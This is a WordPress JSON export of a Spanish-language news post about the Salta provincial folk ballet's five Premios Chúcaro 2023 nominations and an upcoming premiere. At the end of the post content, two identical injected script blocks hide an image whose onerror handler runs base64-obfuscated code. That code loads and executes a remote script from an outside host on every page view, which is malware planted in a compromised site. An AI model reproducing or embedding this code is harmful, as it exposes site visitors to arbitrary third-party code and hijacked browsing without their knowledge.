{"id":3253,"date":"2023-11-06T13:19:54","date_gmt":"2023-11-06T16:19:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3253"},"modified":"2025-08-14T00:06:02","modified_gmt":"2025-08-14T03:06:02","slug":"el-ballet-folkorico-de-la-provincia-se-encuentra-nominado-en-5-categorias-de-premios-chucaro-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3253","title":{"rendered":"El Ballet Folk\u00f3rico de la Provincia se encuentra nominado en 5 categor\u00edas de Premios Ch\u00facaro 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8a0938\"><em>Los \u201cPremios Ch\u00facaro\u201d son una reconocida instancia nacional de premiaci\u00f3n a la danza folkl\u00f3rica, con el objetivo de reconocer y estimular la profesionalizaci\u00f3n y la inserci\u00f3n laboral de los bailarines folkl\u00f3ricos.<\/em><\/h4>\n\n\n\n<p>El 23 de noviembre se dar\u00e1n a conocer los ganadores de los Premios Ch\u00facaro en sus 8 categor\u00edas. En su IV Edici\u00f3n, Premios Chucaro reconocer\u00e1 a nivel nacional los eventos destacados de la danza folkl\u00f3rica estrenados durante el 2023. Integran la direcci\u00f3n colegiada de los premios: Ricky Pashkus, Sergio P\u00e9rez, Luciano Garbuio, Federico Santucho Y Hern\u00e1n Nocioni<br>&nbsp;<br>Estos premios tienen como finalidad la de promover y alentar la profesionalizaci\u00f3n del arte folkl\u00f3rico coreogr\u00e1fico y el Ballet Folk\u00f3rico de la Provincia de Salta se posiciona entre los conjuntos art\u00ecsticos con mayor presencia, ya que se encuentra nominado en 5 de las 8 categor\u00edas participantes debido a la obra \u201cLa Hora del Alba\u201d (2023).<br>&nbsp;<br>Las nominaciones del cuerpo art\u00ecstico son:<br>\u2022 Mejor pareja de baile: los int\u00e9rpretes del BFPS: Fernanda Cabana y Facundo Cabral en la obra \u201cLa Hora del Alba\u201d<br>\u2022 Mejor cuerpo de baile: al elenco del BFPS en la obra: \u201cLa Hora del Alba\u201d<br>\u2022 Mejor coreograf\u00eda: a sus core\u00f3grafos Daniel Espoz, Germ\u00e1n Bonetto y Patricia Padilla con obra \u201cLa Hora del Alba\u201d<br>\u2022 Mejor musicalizaci\u00f3n: \u201cLa Hora del Alba\u201d mejor m\u00fasica<br>\u2022 Mejor Obra: \u201cLa Hora del Alba\u201d- estrenada en Marzo\/2023 en menci\u00f3n a los 40 a\u00f1os del retorno de la Democracia.<br>&nbsp;<br>A lo largo del a\u00f1o, el BFPS ha realizado 29 funciones, alcanzando un total de 58.150 espectadores. Con presencia en 6 municipios del interior con seminarios y reposici\u00f3n de obras, como as\u00ed tambi\u00e9n a nivel nacional con una participaci\u00f3n en la provincia de Misiones. Cuenta con plena articulaci\u00f3n entre los cuerpos estables del Instituto de M\u00fasica y Danza, en el desarrollo de funciones did\u00e1cticas para escuelas, logrando beneficiar a m\u00e1s de 20 instituciones de la ciudad capital en el primer semestre de 2023.<br>&nbsp;<\/p>\n\n\n\n<p>Este 11 de Noviembre a horas 21.30 en el Teatro Provincial, se dar\u00e1 estreno a la \u00faltima creaci\u00f3n del BFPS \u201cDe Patria Amor y Libertad \u00bb inspirada en el texto de Elsa Dulcrof \u00abLa patria de las Mujeres\u00bb, bajo la direcci\u00f3n de Daniel Espoz, la subdirecci\u00f3n de Patricia Padilla. con entrada general de $1000, estudiantes y jubilados gratis.<\/p>\n\n\n\n<p>Participan en la obra estudiantes de la escuela oficial del ballet de la provincia, en la direcci\u00f3n actoral la bailarina Rosario Madrazzo y la colaboraci\u00f3n de Victor Campillay, junto a Academia Danzantes y Zupay Malambo. Entradas en venta, disponibles en SALTA TICKET<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ballet-folkorico-de-la-provincia-se-encuentra-nominado-en-5-categorias-de-premios-chucaro-2023-92724\" target=\"_blank\" rel=\"noopener\" title=\"Secretar\u00eda de Prensa y Comunicaci\u00f3n\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los \u201cPremios Ch\u00facaro\u201d son una reconocida instancia nacional de premiaci\u00f3n a la danza folkl\u00f3rica, con el objetivo de reconocer y estimular la profesionalizaci\u00f3n y la inserci\u00f3n laboral de los bailarines folkl\u00f3ricos. El 23 de noviembre se dar\u00e1n a conocer los ganadores de los Premios Ch\u00facaro en sus 8 categor\u00edas. En su IV Edici\u00f3n, Premios Chucaro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3254,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-3253","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3253"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3253"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3253\/revisions"}],"predecessor-version":[{"id":6929,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3253\/revisions\/6929"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3254"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3253"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3253"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3253"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}